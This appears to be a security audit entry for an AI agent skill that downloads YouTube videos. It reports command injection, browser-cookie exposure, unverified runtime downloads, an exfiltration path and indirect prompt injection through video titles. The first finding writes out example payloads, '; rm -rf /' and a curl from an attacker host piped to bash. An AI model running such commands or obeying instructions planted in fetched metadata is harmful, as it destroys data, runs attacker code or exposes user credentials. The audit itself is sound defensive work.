The Agent Skills Directory

[COMMAND_EXECUTION] (HIGH): The skill instructs the agent to build and execute shell commands using variables such as $VIDEO_URL, URL, and OUTPUT_PATH. These variables are interpolated directly into backticks or bash blocks (e.g., uvx yt-dlp ... "$VIDEO_URL"). Without strict sanitization, an attacker can provide a malicious URL containing shell metacharacters (e.g., ; rm -rf / or ; curl http://attacker.com | bash) to achieve arbitrary code execution on the host machine.
[CREDENTIALS_UNSAFE] (HIGH): The commands explicitly use the --cookies-from-browser chrome flag. This grants the yt-dlp process access to the user's entire Chrome profile, including active session tokens and authentication cookies for all logged-in websites. This is a severe privacy and data exposure risk.
[EXTERNAL_DOWNLOADS] (MEDIUM): The skill utilizes uvx to dynamically download and execute yt-dlp at runtime. While yt-dlp is a common tool, it is fetched from external repositories not included in the 'Trusted GitHub Organizations' list, representing an unverifiable dependency risk.
[DATA_EXFILTRATION] (MEDIUM): While no specific attacker-controlled exfiltration URL is hardcoded, the combination of reading sensitive browser credentials and having full network access (via yt-dlp and uvx) creates a high-risk path for automated data theft.
[PROMPT_INJECTION] (LOW): As the skill processes metadata from external websites (like video titles), it is susceptible to indirect prompt injection if those titles contain instructions that the LLM might mistakenly follow during the 'Show the user' or 'Build command' steps.

youtube-download